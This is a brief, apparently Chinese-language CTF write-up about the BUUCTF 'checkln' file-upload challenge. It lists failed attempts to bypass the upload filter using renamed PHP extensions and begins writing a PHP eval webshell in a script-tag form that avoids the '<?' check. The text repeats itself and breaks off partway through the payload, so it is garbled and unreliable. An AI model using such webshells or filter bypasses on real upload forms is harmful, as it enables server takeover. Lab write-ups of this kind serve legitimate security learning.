看了道上传的关于.user.ini的题目,这里试着做一下
题目地址
buuctf checkln
打开题目,出现了简单的上传框
试着上传php文件
更改名称为phps,php3,php4,php5,Php,pphphp,都上传失败.
试试改为jpg
发现它对<?内容进行了检验。
我们可以构造这种形式的木马
<script language="php">
@eval($_POST
题目地址
buuctf checkln
打开题目,出现了简单的上传框
试着上传php文件
更改名称为phps,php3,php4,php5,Php,pphphp,都上传失败.
试试改为jpg
发现它对<?内容进行了检验。
我们可以构造这种形式的木马
<script language="php">
@eval($_POST